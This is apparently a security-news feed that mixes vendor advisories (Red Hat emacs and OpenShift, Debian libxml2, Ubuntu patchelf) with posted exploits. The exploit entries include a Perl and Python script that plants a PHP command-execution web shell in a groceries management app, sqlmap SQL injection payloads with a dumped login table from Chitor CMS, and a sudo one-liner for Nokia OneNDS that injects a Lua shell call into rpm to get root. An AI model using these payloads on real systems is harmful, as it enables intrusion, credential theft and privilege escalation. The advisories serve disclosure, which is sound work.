Red Hat Security Advisory 2023-1931-01 - GNU Emacs is a powerful, customizable, self-documenting text editor. It provides special code editing features, a scripting language, and the capability to read e-mail and news. Issues addressed include a code execution vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: emacs security update  
Advisory ID:       RHSA-2023:1931-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1931  
Issue date:        2023-04-24  
CVE Names:         CVE-2023-28617   
=====================================================================

1. Summary:

An update for emacs is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS EUS (v.8.6) - noarch

3. Description:

GNU Emacs is a powerful, customizable, self-documenting text editor. It  
provides special code editing features, a scripting language (elisp), and  
the capability to read e-mail and news.

Security Fix(es):

* emacs: command injection vulnerability in org-mode (CVE-2023-28617)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2180544 - CVE-2023-28617 emacs: command injection vulnerability in org-mode

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

aarch64:  
emacs-26.1-7.el8_6.1.aarch64.rpm  
emacs-common-26.1-7.el8_6.1.aarch64.rpm  
emacs-common-debuginfo-26.1-7.el8_6.1.aarch64.rpm  
emacs-debuginfo-26.1-7.el8_6.1.aarch64.rpm  
emacs-debugsource-26.1-7.el8_6.1.aarch64.rpm  
emacs-lucid-26.1-7.el8_6.1.aarch64.rpm  
emacs-lucid-debuginfo-26.1-7.el8_6.1.aarch64.rpm  
emacs-nox-26.1-7.el8_6.1.aarch64.rpm  
emacs-nox-debuginfo-26.1-7.el8_6.1.aarch64.rpm

noarch:  
emacs-terminal-26.1-7.el8_6.1.noarch.rpm

ppc64le:  
emacs-26.1-7.el8_6.1.ppc64le.rpm  
emacs-common-26.1-7.el8_6.1.ppc64le.rpm  
emacs-common-debuginfo-26.1-7.el8_6.1.ppc64le.rpm  
emacs-debuginfo-26.1-7.el8_6.1.ppc64le.rpm  
emacs-debugsource-26.1-7.el8_6.1.ppc64le.rpm  
emacs-lucid-26.1-7.el8_6.1.ppc64le.rpm  
emacs-lucid-debuginfo-26.1-7.el8_6.1.ppc64le.rpm  
emacs-nox-26.1-7.el8_6.1.ppc64le.rpm  
emacs-nox-debuginfo-26.1-7.el8_6.1.ppc64le.rpm

s390x:  
emacs-26.1-7.el8_6.1.s390x.rpm  
emacs-common-26.1-7.el8_6.1.s390x.rpm  
emacs-common-debuginfo-26.1-7.el8_6.1.s390x.rpm  
emacs-debuginfo-26.1-7.el8_6.1.s390x.rpm  
emacs-debugsource-26.1-7.el8_6.1.s390x.rpm  
emacs-lucid-26.1-7.el8_6.1.s390x.rpm  
emacs-lucid-debuginfo-26.1-7.el8_6.1.s390x.rpm  
emacs-nox-26.1-7.el8_6.1.s390x.rpm  
emacs-nox-debuginfo-26.1-7.el8_6.1.s390x.rpm

x86_64:  
emacs-26.1-7.el8_6.1.x86_64.rpm  
emacs-common-26.1-7.el8_6.1.x86_64.rpm  
emacs-common-debuginfo-26.1-7.el8_6.1.x86_64.rpm  
emacs-debuginfo-26.1-7.el8_6.1.x86_64.rpm  
emacs-debugsource-26.1-7.el8_6.1.x86_64.rpm  
emacs-lucid-26.1-7.el8_6.1.x86_64.rpm  
emacs-lucid-debuginfo-26.1-7.el8_6.1.x86_64.rpm  
emacs-nox-26.1-7.el8_6.1.x86_64.rpm  
emacs-nox-debuginfo-26.1-7.el8_6.1.x86_64.rpm

Red Hat Enterprise Linux BaseOS EUS (v.8.6):

Source:  
emacs-26.1-7.el8_6.1.src.rpm

noarch:  
emacs-filesystem-26.1-7.el8_6.1.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-28617  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEYnQtzjgjWX9erEAQjH3w//bWrgMmx4RYmB43o0HZrDlzViBA9LdE7v  
INgXKCdUkzbfl8YflwRIijqn0ENNvUUHeluGwfFQiPmH5mwVpFhvSoLkoyQXBVHx  
i2Z3r6EGhGrMFYZ8FOj24bZNZZkqqRrYPcFymPTQPE/soAMOERVsGdy/nLATcvpO  
I/NblcjcNqWe1VepT3V1i5gwlWOa22OfnJUh9e05LSWkVg/9Gxl2AVcTN9Y2s1jw  
9tg7nJZA/bs2sDbbLawjxPLoNszJlxZAZlITRXVCKGrvutnhqTxFGWOx4fvnQWEa  
3xLz4nLGCr+sXyHu6Q4mjLEK40b74daY80roFfk++fuDuo5dZQIvh/J04tp9oTh2  
1TEBD8INRSC+dEBiDB4ZfuwQvX1C5zn8aFFURluuXFNILsnWbC5crNdtetw75JCS  
4UnRiJnp07XI+Y9ASlf+tIP+r9zqny5KRzrpCTKL+GZ1XzQczkLdP3n2TrMQx2/I  
M9/WFo7ASfLOxsRobk3ddPJd5iGoxyzA4SnU6Cq5utmF8Xl08ZXDCLtXx+GorDH6  
QZdDvUxLUX+PewJZqEmw6R7MfEamt9ORePcsnA/Yemt7tSjSJy8+AI0T/WdHfLHd  
7hqgcbbb/kWyNFWiXEA9td+pkyhphuDDw7x/QDdKHgHJXK23NQvDpmTxg8OH3zGO  
i7gZUc/hfDI=  
=7r7b  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1931-01

This is an extension of research on the original findings of CVE-2020-15858 in Telit Cinterion IoT devices. Numerous issues have been discovered including path traversal, Java privilege elevation, AT commands whitelist / blacklist bypass, a heap overflow in fragmented SMS, and more.

Telit Cinterion IoT Traversal / Escalation / Bypass / Heap Overflow

Red Hat Security Advisory 2023-1930-01 - GNU Emacs is a powerful, customizable, self-documenting text editor. It provides special code editing features, a scripting language, and the capability to read e-mail and news. Issues addressed include a code execution vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: emacs security update  
Advisory ID:       RHSA-2023:1930-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1930  
Issue date:        2023-04-24  
CVE Names:         CVE-2023-28617   
=====================================================================

1. Summary:

An update for emacs is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 8) - noarch

3. Description:

GNU Emacs is a powerful, customizable, self-documenting text editor. It  
provides special code editing features, a scripting language (elisp), and  
the capability to read e-mail and news.

Security Fix(es):

* emacs: command injection vulnerability in org-mode (CVE-2023-28617)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2180544 - CVE-2023-28617 emacs: command injection vulnerability in org-mode

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

aarch64:  
emacs-26.1-7.el8_7.1.aarch64.rpm  
emacs-common-26.1-7.el8_7.1.aarch64.rpm  
emacs-common-debuginfo-26.1-7.el8_7.1.aarch64.rpm  
emacs-debuginfo-26.1-7.el8_7.1.aarch64.rpm  
emacs-debugsource-26.1-7.el8_7.1.aarch64.rpm  
emacs-lucid-26.1-7.el8_7.1.aarch64.rpm  
emacs-lucid-debuginfo-26.1-7.el8_7.1.aarch64.rpm  
emacs-nox-26.1-7.el8_7.1.aarch64.rpm  
emacs-nox-debuginfo-26.1-7.el8_7.1.aarch64.rpm

noarch:  
emacs-terminal-26.1-7.el8_7.1.noarch.rpm

ppc64le:  
emacs-26.1-7.el8_7.1.ppc64le.rpm  
emacs-common-26.1-7.el8_7.1.ppc64le.rpm  
emacs-common-debuginfo-26.1-7.el8_7.1.ppc64le.rpm  
emacs-debuginfo-26.1-7.el8_7.1.ppc64le.rpm  
emacs-debugsource-26.1-7.el8_7.1.ppc64le.rpm  
emacs-lucid-26.1-7.el8_7.1.ppc64le.rpm  
emacs-lucid-debuginfo-26.1-7.el8_7.1.ppc64le.rpm  
emacs-nox-26.1-7.el8_7.1.ppc64le.rpm  
emacs-nox-debuginfo-26.1-7.el8_7.1.ppc64le.rpm

s390x:  
emacs-26.1-7.el8_7.1.s390x.rpm  
emacs-common-26.1-7.el8_7.1.s390x.rpm  
emacs-common-debuginfo-26.1-7.el8_7.1.s390x.rpm  
emacs-debuginfo-26.1-7.el8_7.1.s390x.rpm  
emacs-debugsource-26.1-7.el8_7.1.s390x.rpm  
emacs-lucid-26.1-7.el8_7.1.s390x.rpm  
emacs-lucid-debuginfo-26.1-7.el8_7.1.s390x.rpm  
emacs-nox-26.1-7.el8_7.1.s390x.rpm  
emacs-nox-debuginfo-26.1-7.el8_7.1.s390x.rpm

x86_64:  
emacs-26.1-7.el8_7.1.x86_64.rpm  
emacs-common-26.1-7.el8_7.1.x86_64.rpm  
emacs-common-debuginfo-26.1-7.el8_7.1.x86_64.rpm  
emacs-debuginfo-26.1-7.el8_7.1.x86_64.rpm  
emacs-debugsource-26.1-7.el8_7.1.x86_64.rpm  
emacs-lucid-26.1-7.el8_7.1.x86_64.rpm  
emacs-lucid-debuginfo-26.1-7.el8_7.1.x86_64.rpm  
emacs-nox-26.1-7.el8_7.1.x86_64.rpm  
emacs-nox-debuginfo-26.1-7.el8_7.1.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
emacs-26.1-7.el8_7.1.src.rpm

noarch:  
emacs-filesystem-26.1-7.el8_7.1.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-28617  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEYnQdzjgjWX9erEAQgYZBAAk1j91NDn4D4TtEIZUN/O7x/nUtgn/HNX  
NT9NGe4VIlNmDlLbo2oN2QHN+a6UB3cDMU5zuY/GsxulwbKq+NbSXlcib5X8QG91  
YNSJt0lhIZkATQKLetcS8+sfIS3I03cLJVTeTFzll/yjVhQl9loKrDE9XO0TO7MG  
mkfwMCPSj7SZe8BMKPQKVQ0lxrTrZ6+OcTsTmh7v6KtuwoR2ekqzdHKbWkcaFPlA  
R/XvN6HwVD10jTbQXoN9p5576TAEHynJ0BkyqtaGs7cNQeGd3deFDjOj/rTdrs7I  
bVrfpgO7MAuHXj6gnIILghLRSNIwEABmiQlT67+9p1z/zrhhkWU4Cjy3Xe8v5sXl  
jctLAHnqz0Eds+5vGp8L+uPfyXjrEoGGtVGO3ruJPcf7UqufSkkOKJHt28fmJwgW  
dnIAXKy3Fdg15b06Dc50QvYEFNkkYU801IgWFZb75PcNr6nLluO6KZwteCJO8w7r  
DP44IubEiri4VMkYxk3KTwZk6IjKdpGcoyDLy7FANHbGarbYDctmxlw7OY10ygck  
Ewt6nzD52qgwyt5q7CCpH/KYa96uJXAugmkUiEwQHeHZakMq2yyiXrxg7b1Gg88o  
ttZSL2pdeYg4oNs3bU6A5GrSP57zGWEYY++1zbJCew9EKdBAnJw5vqRsq6x/JBQc  
6Wk6g1DQ26M=  
=u1kk  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1930-01

Red Hat Security Advisory 2023-1816-01 - Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Data Foundation. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Red Hat OpenShift Data Foundation 4.12.2 Bug Fix and security update  
Advisory ID:       RHSA-2023:1816-01  
Product:           RHODF  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1816  
Issue date:        2023-04-17  
CVE Names:         CVE-2020-10735 CVE-2021-28861 CVE-2022-4304   
                   CVE-2022-4415 CVE-2022-4450 CVE-2022-40897   
                   CVE-2022-41717 CVE-2022-45061 CVE-2022-48303   
                   CVE-2023-0215 CVE-2023-0286 CVE-2023-23916   
=====================================================================

1. Summary:

Updated images that fix several bugs are now available for Red Hat  
OpenShift Data Foundation 4.12.2 on Red Hat Enterprise Linux 8 from Red Hat  
Container Registry.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Data Foundation is software-defined storage integrated  
with and optimized for the Red Hat OpenShift Data Foundation. Red Hat  
OpenShift Data Foundation is a highly scalable, production-grade persistent  
storage for stateful applications running in the Red Hat OpenShift  
Container Platform. In addition to persistent storage, Red Hat OpenShift  
Data Foundation provisions a multicloud data management service with an S3  
compatible API.

Security Fix(es):

* golang: net/http: An attacker can cause excessive memory growth in a Go  
server accepting HTTP/2 requests (CVE-2022-41717)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* [backport 4.12] s3 sync directory to a bucket fails with Internal Error  
in between the upload operation (BZ#2170416)

* [4.12 clone] [Noobaa] Secrets are used in env variables (BZ#2171968)

* [Backport to 4.12.z] Placeholder bug to backport the odf changes for  
Managed services epic RHSTOR-2442  to 4.12.z (BZ#2174335)

* [ODF 4.12] Missing the status-reporter binary causing pods  
"report-status-to-provider" remain in CreateContainerError on ODF to ODF  
cluster on ROSA (BZ#2179978)

* [MDR] After upgrade(redhat-operators) on hub from 4.12.1 to 4.12.2  
noticed 2 token-exchange-agent pods on managed clusters and one of them on  
CBLO (BZ#2183198)

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2161274 - CVE-2022-41717 golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests  
2171968 - [4.12 clone] [Noobaa] Secrets are used in env variables  
2174335 - [Backport to 4.12.z] Placeholder bug to backport the odf changes for Managed services epic RHSTOR-2442  to 4.12.z  
2175365 - [4.12.z] Upgrade from 4.12.0 to 4.12.1 doesn't work  
2179978 - [ODF 4.12] Missing the status-reporter binary causing pods "report-status-to-provider" remain in CreateContainerError on ODF to ODF cluster on ROSA  
2183198 - [MDR] After upgrade(redhat-operators) on hub from 4.12.1 to 4.12.2 noticed 2 token-exchange-agent pods on managed clusters and one of them on CBLO  
2186455 - Include at ODF 4.12 container images the RHEL8 CVE fix on "openssl"

5. References:

https://access.redhat.com/security/cve/CVE-2020-10735  
https://access.redhat.com/security/cve/CVE-2021-28861  
https://access.redhat.com/security/cve/CVE-2022-4304  
https://access.redhat.com/security/cve/CVE-2022-4415  
https://access.redhat.com/security/cve/CVE-2022-4450  
https://access.redhat.com/security/cve/CVE-2022-40897  
https://access.redhat.com/security/cve/CVE-2022-41717  
https://access.redhat.com/security/cve/CVE-2022-45061  
https://access.redhat.com/security/cve/CVE-2022-48303  
https://access.redhat.com/security/cve/CVE-2023-0215  
https://access.redhat.com/security/cve/CVE-2023-0286  
https://access.redhat.com/security/cve/CVE-2023-23916  
https://access.redhat.com/security/updates/classification/#moderate

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEOpudzjgjWX9erEAQgudA//c1DhcceGIufqRhheeM1fMJLx1pr8aS5C  
fVkwxXyNVip1BZta1fwLstIPEcbNG1Q3xCnjVmDqjxkG4sPh7HdkzmtIVdt9JSBX  
3TKSqHUMtP7m1dtlP8xg2fyQ8Om7Ki9xE6KCkijR3TwDZMZOkFtRg6D9MbSPT7+s  
3tvq+vEQ2HVr13KEdMC7kSSyvZsqLgCT3LcURFxn/rZipGy+DDJeK8uGhMe2uF43  
QPsYBb0qhm2s6T+6QWhBPahOgDxqCtP8KSgO6RNuieubL/E+wr+sV8LBXkrPZ71N  
QT6MEY7R8x5Af7+04t0INnFg2Bqo+eJPLPgLGpTqFtJeoDm0HAeqliHgv7SFqex5  
FPArRIPPgzjjEFASv4dr1r4WKAr9PWaGCrFE4OZM2m5ibQi//SWJuEn1719T5WDf  
+BGCJ8UfOWOX3J385rECIm2r0ZL5yPq2XBoPJUEcA0I0YSswlOjD6V6ovaROSNrh  
NU2eA/xSj4vwDTEC+FojZAeL1IT7uAFUJCYMq+zcyqTFRE+C7tDo8zcnVuJVhHq2  
xhezfIlbgBbcEHr5omqVp4utqDSCfYfhoGFxUJtW07iEJmq01R9lPsNbdVQsAGW4  
8/Xt+P4wU6LIYNcAM4S5yxMy2KMN/rDKwoxSljg4I6dM8uWUJAF2iaGA1+T2dKq5  
GfmMJLVuC8A=  
=MYP7  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1816-01

Multi-Vendor Online Groceries Management System version 1.0 suffers from a remote code execution vulnerability.

    # Exploit Title: Multi-Vendor Online Groceries Management System 1.0 - Remote Code Execution (RCE)# Date: 4/23/2023# Author: Or4nG.M4n# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html# Version: 1.0# Tested on: windows## Vuln File : SystemSettings.php < here you can inject php code#     if(isset($_POST['content'])){#      foreach($_POST['content'] as $k => $v)#      file_put_contents("../{$k}.html",$v); <=== put any code into welcome.html or whatever you want#    }# Vuln File : home.php < here you can include and execute you're php code#                   <h3 class="text-center">Welcome</h3>#                   <hr>#                   <div class="welcome-content">#                       <?php include("welcome.html") ?> <=== include #                   </div># Perl Code use LWP::UserAgent;use LWP::Simple;print "Target Url #";my $url = <STDIN>;chomp $url;$backdoor = '<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'; my $ua       = LWP::UserAgent->new();my $response = $ua->post( $url."/classes/SystemSettings.php?f=update_settings", { 'content[welcome]' => $backdoor } );my $content  = $response->decoded_content();print "[+] injection in welcome page\n";print "[+] backdoor url ".$url."/?cmd=ls -al";# Python Codeimport requests url = input("Enter url :")postdata = {'content[welcome]':'<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'}resp = requests.post(url+"/classes/SystemSettings.php?f=update_settings", postdata)print("[+] injection in welcome page")print("[+]"+url+"/?cmd=ls -al")print("\n")

Multi-Vendor Online Groceries Management System 1.0 Remote Code Execution

Chitor CMS version 1.1.2 suffers from a remote SQL injection vulnerability. Original discovery of this finding is attributed to msd0pe in April of 2023.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://github.com/waqaskanju/Chitor-CMS                                   ││  Vendor   : Waqas Ahmad                                                                ││  Software : Chitor-CMS 1.1.2                                                           ││  Vuln Type: SQL Injection                                                              ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│ Release Notes:                                                                         ││ ═════════════                                                                          ││                                                                                        ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and     ││ damage to a company's reputation.                                                      ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /detail_student.php/detail_student.php?name=[SQLI]&search=SearchGET parameter 'name' is vulnerable to SQLI---Parameter: name (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)    Payload: name=123' AND 7885=7885#&search=Search    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: name=123' AND (SELECT 9128 FROM(SELECT COUNT(*),CONCAT(0x71716b6271,(SELECT (ELT(9128=9128,1))),0x716a6b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- DaVE&search=Search    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: name=123' AND (SELECT 1784 FROM (SELECT(SLEEP(5)))AjPI)-- FsLQ&search=Search---GET parameter 'name' is vulnerable to SQLI[+] Starting the Attackfetching current databasecurrent database: ''**********_chitor_db'fetching tables for database: '**********_chitor_db'Database: **********_chitor_db[12 tables]+-----------------+| position        || class_subjects  || employees       || login           || marks           || school_classes  || schools         || setting         || students_info   || subject_teacher || subjects        || tab_index       |+-----------------+fetching columns for table 'login' in database '**********_chitor_db'Table: login[5 columns]+-------------+--------------+| Column      | Type         |+-------------+--------------+| Password    | varchar(256) || Status      | int(11)      || Employee_Id | int(11)      || Id          | int(11)      || User_Name   | varchar(30)  |+-------------+--------------+fetching entries of column(s) 'Employee_Id,Id,User_Name,`Password`,`Status`' for table 'login' in database '**********_chitor_db'Table: login[3 entries]+----+----------+------------------------------------------+-------------+------------+| Id | Status   | Password                                 | Employee_Id | User_Name  |+----+----------+------------------------------------------+-------------+------------+| 1  | 1        | *****1a7fdd83dd1e2a309ce759***** (****)  | 1           | Guest      || 2  | 1        | *****82fb3cee50d9272ba79822*****         | 2           | **qa*kan** || 3  | 1        | *****f297a57a5a743894a0e4a8***** (****)  | 3           | admin      |+----+----------+------------------------------------------+-------------+------------+[-] Done

Chitor CMS 1.1.2 SQL Injection

Debian Linux Security Advisory 5391-1 - Several vulnerabilities were discovered in libxml2, a library providing support to read, modify and write XML and HTML files.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5391-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoApril 20, 2023                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : libxml2CVE ID         : CVE-2023-28484 CVE-2023-29469Debian Bug     : 1034436 1034437Several vulnerabilities were discovered in libxml2, a library providingsupport to read, modify and write XML and HTML files.CVE-2023-28484    A NULL pointer dereference flaw when parsing invalid XML schemas may    result in denial of service.CVE-2023-29469    It was reported that when hashing empty strings which aren't    null-terminated, xmlDictComputeFastKey could produce inconsistent    results, which may lead to various logic or memory errors.For the stable distribution (bullseye), these problems have been fixed inversion 2.9.10+dfsg-6.7+deb11u4.We recommend that you upgrade your libxml2 packages.For the detailed security status of libxml2 please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/libxml2Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmRBo8BfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0SJJg//UIK3AxfSJq/tbbIu1hav33WMU6LMM0Jg/eEFB6gY4NFM45GMFn4UuSVbuenD4Nx5CyRnahhypbxzZdsVO9DjrAGjBpoyjlOHNQPddHRYbujZU0gVHwfam50fKJjdnkzFwsxkTOwF0UloNwqAvBUp2LG5Eqjz1CPvcbAAyRYIyyYdj3uLRuz/Zv8J6z/nvDndCsN4RWqioGvaH084Y0QsmkGV7devmEDZ9ybiiGBQ4Dq3H2aTMYwx63McN7kbcGEZiuBT4S5fZXzmlH5lEKjlSbOzhqXyL4UxnrXs7RaAc+qqamokTKyy2hzfaW7zoEPymSl7Zoix3r8BR4GZs6HlPUhwOdnuRhqqOzF1Q2qmefj5GtlmuhtSmZKan8AdLuFEp42Rxii6u8UJZ7RS3lqH70RgMgBKtjLD4TX6RpisSwGzrjKh7AonFLPFeaEXbABD8/wTePQCbzYNn8xWgkT8A4a3PRnQEwFJO51ajhx772O9XepqSh46INnxraxFAyOPveHXfi+6msmP7gf5TxNa9FA69eQOoyZJpMxlm8u4DvPNPN75TdA4alMDg5l41yCec745vFt1lhBHki//CTey7NCi5ElqBKlvoQV7SgIUeHW5U6TWDgWTTfZN69MWFk14M7ddEP+0cckyTcHun2vid7dm84iEwwbg0dMHcmpDV1Y==btNX-----END PGP SIGNATURE-----

Debian Security Advisory 5391-1

Ubuntu Security Notice 6036-1 - It was discovered that PatchELF was not properly performing bounds checks, which could lead to an out-of-bounds read via a specially crafted file. An attacker could possibly use this issue to cause a denial of service or to expose sensitive information.

==========================================================================

Ubuntu Security Notice USN-6036-1  
April 20, 2023

patchelf vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 ESM

Summary:

patchelf could be made to crash or read sensitive data if it opened  
a specially crafted file.

Software Description:  
- patchelf: modify properties of ELF executables

Details:

It was discovered that PatchELF was not properly performing bounds  
checks, which could lead to an out-of-bounds read via a specially  
crafted file. An attacker could possibly use this issue to cause a  
denial of service or to expose sensitive information. (CVE-2022-44940)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
patchelf 0.14.3-1ubuntu0.1

Ubuntu 22.04 ESM:  
patchelf 0.14.3-1ubuntu0.1~esm1

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-6036-1  
CVE-2022-44940

Package Information:  
https://launchpad.net/ubuntu/+source/patchelf/0.14.3-1ubuntu0.1

Ubuntu Security Notice USN-6036-1

Nokia OneNDS 20.9 has loose sudo permissions that can allow users to escalate privileges.

    ===============================================================================             title: Incorrect Permission Assignment           product: Nokia OneNDS 20.9vulnerability type: Security Misconfiguration          severity: High        CVSS Score: 7.8       CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H          found on: 04/05/2022                by: Giacomo Sighinolfi <giacomosighinolfi@gmail.com>               cve: CVE-2022-30759===============================================================================Some sudo permissions can be exploited by some users to escalate to root privileges and execute arbitrary commands on the system.The affected users are:  Provgw, notifs, dbmrun,   (system users)They can run as root the following script:  /opt/cntdb/bin/noscripts_rpm.shIt can be exploited with:  sudo  /opt/cntdb/bin/noscripts_rpm.sh force-erase     "--eval '%{lua:os.execute(\"/bin/sh\")}'"===============================================================================  Detailed analysis:The script accept as first argument one of the these options:   install|update|fallback|erase|test-install|test-update|test-erase|  force-install|force-update|force-erase and as a second argument an arbitrary rpm package name.If we analyze the switch case code block (row 175) we can see how the first argument influence the execution of the script.175. case "$1" in…224.   test-erase)225.         TEST_OPTION="--test"226.         OPTION="-e"227.      ;;…238.   force-erase)239.         TEST_OPTION="--nodeps"240.         OPTION="-e"241.      ;;…Using “force-erase” or “test-erase” as the first argument, it creates “OPTION” variable with “-e” as its value. That value allow us to trigger a privilege escalation exploiting the rpm command (row 254) with a particular rpm package name as second parameter passed to the script.…252. if [ $OPTION == "-e" ]253. then254.   rpm $OPTION --noscripts $TEST_OPTION $2…===============================================================================

Nokia OneNDS 20.9 Insecure Permissions / Privilege Escalation

Nokia OneNDS 17 has loose sudo permissions that can allow users to escalate privileges.

